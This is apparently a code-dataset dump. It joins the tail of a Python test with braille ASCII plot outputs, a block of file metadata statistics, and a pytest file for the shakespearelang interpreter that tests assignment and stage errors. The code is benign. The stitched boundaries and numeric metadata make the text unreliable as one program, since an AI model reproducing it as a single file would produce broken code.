0.48000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.4500000 0.4625000 0.4750000 0.4875000 0.5000000 0.5125000 0.5250000 0.5375000 0.5500000"""
print(plot([0.5, 0.5], [0.5, 0.5]))
assert expected == plot([0.5, 0.5], [0.5, 0.5])
def test_single_value():
expected = """ (Y) ^
0.55000000 |
0.54750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.4500000 0.4625000 0.4750000 0.4875000 0.5000000 0.5125000 0.5250000 0.5375000 0.5500000"""
print(plot([0.5], [0.5]))
assert expected == plot([0.5], [0.5])
| 82.656716
| 105
| 0.128867
| 674
| 16,614
| 22.143917
| 0.192878
| 0.629548
| 0.002412
| 0.003216
| 0.745193
| 0.745193
| 0.744255
| 0.740235
| 0.740235
| 0.739967
| 0
| 0.114248
| 0.044842
| 16,614
| 200
| 106
| 83.07
| 0.019661
| 0.001264
| 0
| 0.7
| 0
| 0.021053
| 0.961726
| 0.794648
| 0
| 0
| 0
| 0
| 0.021053
| 1
| 0.021053
| false
| 0
| 0.010526
| 0
| 0.031579
| 0.026316
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a1f5e2e4db6bff2f10312cd454de491b3d1a964b
| 3,189
|
py
|
Python
|
shakespearelang/tests/test_assignment.py
|
zmbc/shakespeare
|
8a598d21c586c4c17442c4a71ccd291a946184d9
|
[
"MIT"
] | null | null | null |
shakespearelang/tests/test_assignment.py
|
zmbc/shakespeare
|
8a598d21c586c4c17442c4a71ccd291a946184d9
|
[
"MIT"
] | null | null | null |
shakespearelang/tests/test_assignment.py
|
zmbc/shakespeare
|
8a598d21c586c4c17442c4a71ccd291a946184d9
|
[
"MIT"
] | null | null | null |
from shakespearelang import Shakespeare
from shakespearelang.errors import ShakespeareRuntimeError
from io import StringIO
import pytest
def test_assign_character(capsys):
s = Shakespeare("Foo. Juliet, a test. Romeo, a test.")
s.run_event("[Enter Romeo and Juliet]")
assert s.state.character_by_name("Romeo").value == 0
s.run_sentence("You are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 2
s.state.character_by_name("Romeo").value = 0
s.run_sentence("You are a pig!", "Juliet")
assert s.state.character_by_name("Romeo").value == -1
captured = capsys.readouterr()
assert captured.out == ""
assert captured.err == ""
def test_errors_without_character_opposite(capsys):
s = Shakespeare("Foo. Juliet, a test. Romeo, a test. Macbeth, a test.")
s.run_event("[Enter Juliet]")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Macbeth").value == 0
with pytest.raises(ShakespeareRuntimeError) as exc:
s.run_sentence("You are as good as a furry animal!", "Juliet")
assert "talking to nobody" in str(exc.value).lower()
assert ">>You are as good as a furry animal!<<" in str(exc.value)
assert exc.value.interpreter == s
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Macbeth").value == 0
s.run_event("[Enter Macbeth and Romeo]")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Macbeth").value == 0
with pytest.raises(ShakespeareRuntimeError) as exc:
s.run_sentence("You are as good as a furry animal!", "Juliet")
assert "ambiguous" in str(exc.value).lower()
assert ">>You are as good as a furry animal!<<" in str(exc.value)
assert exc.value.interpreter == s
assert s.state.character_by_name("Romeo").value == 0
